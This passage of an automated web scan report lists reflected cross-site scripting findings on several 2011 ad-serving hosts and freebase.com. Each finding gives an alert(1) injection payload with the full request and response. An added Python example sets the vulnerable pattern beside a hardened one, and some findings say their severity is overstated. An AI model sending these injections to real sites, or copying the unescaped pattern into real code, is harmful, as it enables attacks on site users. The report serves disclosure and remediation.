Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33898"-alert(1)-"7c7717e2c00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?anmember=541&anprice=300&ad_type=ad&ad_size=300x250&section=1588565&33898"-alert(1)-"7c7717e2c00=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://adserving2.cpxinteractive.com/st?ad_type=iframe&ad_size=300x250&section=1588565
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:01 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Thu, 12 May 2011 13:33:01 GMT
Pragma: no-cache
Content-Length: 4350
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.yieldmanager.com/imp?33898"-alert(1)-"7c7717e2c00=1&Z=300x250&anmember=541&anprice=300&s=1588565&_salt=1432320579";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_pass
...[SNIP]...

2.40. http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld-match.dotomi.com
Path:   /admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 859ac'%3balert(1)//eb6d7e629b3 was submitted in the admeld_adprovider_id parameter. This input was echoed as 859ac';alert(1)//eb6d7e629b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld/match?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=78859ac'%3balert(1)//eb6d7e629b3&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:36 GMT
X-Name: rtb-o08
Cache-Control: max-age=0, no-store
Content-Type: text/javascript
Connection: close
Content-Length: 160

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=78859ac';alert(1)//eb6d7e629b3&external_user_id=0&expiration=1305466116" alt="" />');

2.41. http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld-match.dotomi.com
Path:   /admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1bf5'%3balert(1)//29020a9a6e5 was submitted in the admeld_callback parameter. This input was echoed as f1bf5';alert(1)//29020a9a6e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld/match?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=78&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchf1bf5'%3balert(1)//29020a9a6e5 HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:37 GMT
X-Name: rtb-o04
Cache-Control: max-age=0, no-store
Content-Type: text/javascript
Connection: close
Content-Length: 160

document.write('<img src="http://tag.admeld.com/matchf1bf5';alert(1)//29020a9a6e5?admeld_adprovider_id=78&external_user_id=0&expiration=1305466117" alt="" />');
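
The two admeld-match findings above share one root cause: request parameters are concatenated straight into a single-quoted JavaScript string that document.write()s an <img>, so a single quote in either parameter ends the string and the rest of the value runs as code. The following is an added example, not code from dotomi or admeld, showing that pattern beside a hardened version. It validates the callback against an allowlisted host and a plain path and requires admeld_adprovider_id to be numeric (both rules are assumptions; the page does not say what legitimate values look like), and it encodes the value once for each context it crosses: URL query, HTML attribute, then JavaScript string literal.

```python
"""Hardened rendering of the cookie-match pixel from findings 2.40 and 2.41.

Added example, not dotomi/admeld code. Reproduces the response shape shown on
the page (a text/javascript body that document.write()s an <img>) and the fix:
validate both parameters, then encode each value for every context it passes
through. The allowed host and the numeric-id rule are assumptions.
"""
from __future__ import annotations

import html
import json
import re
from urllib.parse import quote, urlsplit

# Assumption: the only legitimate callback host; adjust for a real deployment.
ALLOWED_CALLBACK_HOSTS = {"tag.admeld.com"}
_SAFE_PATH = re.compile(r"^/[A-Za-z0-9_./-]*$")
_NUMERIC_ID = re.compile(r"^[0-9]{1,10}$")

# Constructed inputs: the two payloads recorded in 2.40 and 2.41, URL-decoded.
PAYLOAD_PROVIDER = "78859ac';alert(1)//eb6d7e629b3"
PAYLOAD_CALLBACK = "http://tag.admeld.com/matchf1bf5';alert(1)//29020a9a6e5"


def vulnerable_match_js(callback: str, adprovider_id: str) -> str:
    """The unsafe pattern: raw concatenation into a single-quoted JS string."""
    return ("document.write('<img src=\"" + callback
            + "?admeld_adprovider_id=" + adprovider_id
            + "&external_user_id=0\" alt=\"\" />');")


def validate(callback: str, adprovider_id: str) -> None:
    """Reject anything but a bare path on an allowed host plus a numeric id."""
    parts = urlsplit(callback)
    if parts.scheme not in ("http", "https") or parts.hostname not in ALLOWED_CALLBACK_HOSTS:
        raise ValueError("callback host not allowed")
    if parts.query or parts.fragment or not _SAFE_PATH.match(parts.path):
        raise ValueError("callback must be a bare path on the allowed host")
    if not _NUMERIC_ID.match(adprovider_id):
        raise ValueError("adprovider_id must be numeric")


def render_match_js(callback: str, adprovider_id: str, validate_input: bool = True) -> str:
    """Encode for each nesting level, innermost first:
    1. URL-encode the query value (safe='' also encodes '/').
    2. HTML-escape the attribute value ('&' -> '&amp;', quotes -> entities).
    3. JSON-encode the markup as a JS string literal, and additionally escape
       '<' and '>' so the literal can never close a surrounding <script>.
    validate_input=False is only for demonstrating the encoding on its own."""
    if validate_input:
        validate(callback, adprovider_id)
    url = f"{callback}?admeld_adprovider_id={quote(adprovider_id, safe='')}&external_user_id=0"
    markup = f'<img src="{html.escape(url, quote=True)}" alt="" />'
    literal = json.dumps(markup).replace("<", "\\u003c").replace(">", "\\u003e")
    return f"document.write({literal});"


def is_rejected(callback: str, adprovider_id: str) -> bool:
    """True when validation refuses the pair."""
    try:
        validate(callback, adprovider_id)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(vulnerable_match_js("http://tag.admeld.com/match", PAYLOAD_PROVIDER))
    print(render_match_js("http://tag.admeld.com/match", PAYLOAD_PROVIDER, validate_input=False))
    print(render_match_js(PAYLOAD_CALLBACK, "78", validate_input=False))
    print(is_rejected("http://tag.admeld.com/match", PAYLOAD_PROVIDER), is_rejected(PAYLOAD_CALLBACK, "78"))
```

The allowlist is the real fix, since the remediation text above is right that user data has no business in a script context; the layered encoding is what keeps the response safe on the day someone loosens the allowlist. Note the order: the value is URL-encoded first because it ends up inside a URL, and the JS-string encoding is applied last because the JS string is the outermost container.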

2.42. http://adserving2.cpxinteractive.com/st [ad_size parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving2.cpxinteractive.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1ab8'-alert(1)-'9dbe414d80d was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=300x250e1ab8'-alert(1)-'9dbe414d80d&section=1588565 HTTP/1.1
Host: adserving2.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 13:33:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Thu, 12 May 2011 13:33:01 GMT
Content-Length: 778

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=300x250e1ab8'-alert(1)-'9dbe414d80d&inv_code=1588565&referrer=http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanme
...[SNIP]...

2.43. http://adserving2.cpxinteractive.com/st [ad_size parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving2.cpxinteractive.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57220"><script>alert(1)</script>2ef17f08d0b was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=300x25057220"><script>alert(1)</script>2ef17f08d0b&section=1588565 HTTP/1.1
Host: adserving2.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 13:32:57 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Thu, 12 May 2011 13:32:57 GMT
Content-Length: 848

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=300x25057220"><script>alert(1)</script>2ef17f08d0b&inv_code=1588565&referr
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=300x25057220"><script>alert(1)</script>2ef17f08d0b&s=1588565&t=2" target="parent">
...[SNIP]...

2.44. http://adserving2.cpxinteractive.com/st [section parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving2.cpxinteractive.com
Path:   /st

Issue detail

The value of the section request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82137"><script>alert(1)</script>23748e7fa31 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=158856582137"><script>alert(1)</script>23748e7fa31 HTTP/1.1
Host: adserving2.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 13:33:04 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Thu, 12 May 2011 13:33:04 GMT
Content-Length: 848

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=300x250&inv_code=158856582137"><script>alert(1)</script>23748e7fa31&referr
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=300x250&s=158856582137"><script>alert(1)</script>23748e7fa31&t=2" target="parent">
...[SNIP]...

2.45. http://adserving2.cpxinteractive.com/st [section parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving2.cpxinteractive.com
Path:   /st

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85a49'-alert(1)-'85e9fe16d09 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=158856585a49'-alert(1)-'85e9fe16d09 HTTP/1.1
Host: adserving2.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 13:33:08 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Thu, 12 May 2011 13:33:08 GMT
Content-Length: 778

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=300x250&inv_code=158856585a49'-alert(1)-'85e9fe16d09&referrer=http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anpr
...[SNIP]...

2.46. http://api.freebase.com/api/trans/image_thumb/en/apple_inc [maxheight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/apple_inc

Issue detail

The value of the maxheight request parameter is echoed unencoded inside a JSON string in the application's 400 Bad Request error body, which is served with Content-Type: text/plain; charset=utf-8 rather than as an HTML document. The payload 1eb94<script>alert(1)</script>020c643f79e was submitted in the maxheight parameter. This input was echoed unmodified in the application's response.

The reflection is unencoded, but because the response declares itself text/plain (and sets no X-Content-Type-Options: nosniff header) a browser that honours the declared type displays the payload as text; it executes only if this body is embedded in an HTML page elsewhere or the browser sniffs it as HTML, so the High/Certain rating above overstates what this response alone shows.

Request

GET /api/trans/image_thumb/en/apple_inc?maxwidth=32&maxheight=321eb94<script>alert(1)</script>020c643f79e&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:11 GMT
Server: Apache
X-Metaweb-Cost: cc=0.016, dt=0.027, mcs=0.0, mcu=0.0, nivcsw=1, tm=0.0, utime=0.015
Expires: Thu, 12 May 2011 13:31:12 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache02.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache02.p01.sjc1:8101;2011-05-12T13:31:11Z;0046
Content-Length: 390

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxheight",
"value": "321eb94<script>alert(1)</script>020c643f79e"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache02.p01.sjc1:8101;2011-05-12T13:31:11Z;0046"
}

2.47. http://api.freebase.com/api/trans/image_thumb/en/apple_inc [maxwidth parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/apple_inc

Issue detail

The value of the maxwidth request parameter is echoed unencoded inside a JSON string in the application's 400 Bad Request error body, which is served with Content-Type: text/plain; charset=utf-8 rather than as an HTML document. The payload 19c68<script>alert(1)</script>0b3c41db23c was submitted in the maxwidth parameter. This input was echoed unmodified in the application's response.

The reflection is unencoded, but because the response declares itself text/plain (and sets no X-Content-Type-Options: nosniff header) a browser that honours the declared type displays the payload as text; it executes only if this body is embedded in an HTML page elsewhere or the browser sniffs it as HTML, so the High/Certain rating above overstates what this response alone shows.

Request

GET /api/trans/image_thumb/en/apple_inc?maxwidth=3219c68<script>alert(1)</script>0b3c41db23c&maxheight=32&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:30:57 GMT
Server: Apache
X-Metaweb-Cost: cc=0.016, dt=0.017, mcs=0.0, mcu=0.0, tm=0.0, utime=0.016
Expires: Thu, 12 May 2011 13:30:58 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache02.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache02.p01.sjc1:8101;2011-05-12T13:30:57Z;0008
Content-Length: 389

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxwidth",
"value": "3219c68<script>alert(1)</script>0b3c41db23c"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache02.p01.sjc1:8101;2011-05-12T13:30:57Z;0008"
}

2.48. http://api.freebase.com/api/trans/image_thumb/en/apple_inc [mode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/apple_inc

Issue detail

The value of the mode request parameter is echoed unencoded inside JSON strings (the info.value field and the validation message) in the application's 400 Bad Request error body, which is served with Content-Type: text/plain; charset=utf-8 rather than as an HTML document. The payload 79d15<script>alert(1)</script>9d176111042 was submitted in the mode parameter. This input was echoed unmodified in the application's response.

The reflection is unencoded, but because the response declares itself text/plain (and sets no X-Content-Type-Options: nosniff header) a browser that honours the declared type displays the payload as text; it executes only if this body is embedded in an HTML page elsewhere or the browser sniffs it as HTML, so the High/Certain rating above overstates what this response alone shows.

Request

GET /api/trans/image_thumb/en/apple_inc?maxwidth=32&maxheight=32&mode=fillcrop79d15<script>alert(1)</script>9d176111042 HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:25 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, nivcsw=1, tm=0.0, utime=0.012
Expires: Thu, 12 May 2011 13:31:26 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache04.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache04.p01.sjc1:8101;2011-05-12T13:31:25Z;0067
Content-Length: 475

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "mode",
"value": "fillcrop79d15<script>alert(1)</script>9d176111042"
},
"message": "Value must be one of: fit; fill; fillcrop; fillcropmid (not u'fillcrop79d15<script>
...[SNIP]...

2.49. http://api.freebase.com/api/trans/image_thumb/en/gadget [maxheight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/gadget

Issue detail

The value of the maxheight request parameter is echoed unencoded inside a JSON string in the application's 400 Bad Request error body, which is served with Content-Type: text/plain; charset=utf-8 rather than as an HTML document. The payload 2859f<script>alert(1)</script>c6228f7744b was submitted in the maxheight parameter. This input was echoed unmodified in the application's response.

The reflection is unencoded, but because the response declares itself text/plain (and sets no X-Content-Type-Options: nosniff header) a browser that honours the declared type displays the payload as text; it executes only if this body is embedded in an HTML page elsewhere or the browser sniffs it as HTML, so the High/Certain rating above overstates what this response alone shows.

Request

GET /api/trans/image_thumb/en/gadget?maxwidth=32&maxheight=322859f<script>alert(1)</script>c6228f7744b&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:19 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, nivcsw=1, oublock=8, tm=0.0, utime=0.012
Expires: Thu, 12 May 2011 13:31:20 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache02.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache02.p01.sjc1:8101;2011-05-12T13:31:19Z;0027
Content-Length: 390

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxheight",
"value": "322859f<script>alert(1)</script>c6228f7744b"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache02.p01.sjc1:8101;2011-05-12T13:31:19Z;0027"
}

2.50. http://api.freebase.com/api/trans/image_thumb/en/gadget [maxwidth parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/gadget

Issue detail

The value of the maxwidth request parameter is echoed unencoded inside a JSON string in the application's 400 Bad Request error body, which is served with Content-Type: text/plain; charset=utf-8 rather than as an HTML document. The payload e65d4<script>alert(1)</script>907a070820 was submitted in the maxwidth parameter. This input was echoed unmodified in the application's response.

The reflection is unencoded, but because the response declares itself text/plain (and sets no X-Content-Type-Options: nosniff header) a browser that honours the declared type displays the payload as text; it executes only if this body is embedded in an HTML page elsewhere or the browser sniffs it as HTML, so the High/Certain rating above overstates what this response alone shows.

Request

GET /api/trans/image_thumb/en/gadget?maxwidth=32e65d4<script>alert(1)</script>907a070820&maxheight=32&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:02 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, tm=0.0, utime=0.012
Expires: Thu, 12 May 2011 13:31:03 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache03.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache03.p01.sjc1:8101;2011-05-12T13:31:02Z;0032
Content-Length: 388

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxwidth",
"value": "32e65d4<script>alert(1)</script>907a070820"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache03.p01.sjc1:8101;2011-05-12T13:31:02Z;0032"
}

2.51. http://api.freebase.com/api/trans/image_thumb/en/gadget [mode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/gadget

Issue detail

The value of the mode request parameter is echoed unencoded inside JSON strings (the info.value field and the validation message) in the application's 400 Bad Request error body, which is served with Content-Type: text/plain; charset=utf-8 rather than as an HTML document. The payload db893<script>alert(1)</script>797f7dc6251 was submitted in the mode parameter. This input was echoed unmodified in the application's response.

The reflection is unencoded, but because the response declares itself text/plain (and sets no X-Content-Type-Options: nosniff header) a browser that honours the declared type displays the payload as text; it executes only if this body is embedded in an HTML page elsewhere or the browser sniffs it as HTML, so the High/Certain rating above overstates what this response alone shows.

Request

GET /api/trans/image_thumb/en/gadget?maxwidth=32&maxheight=32&mode=fillcropdb893<script>alert(1)</script>797f7dc6251 HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
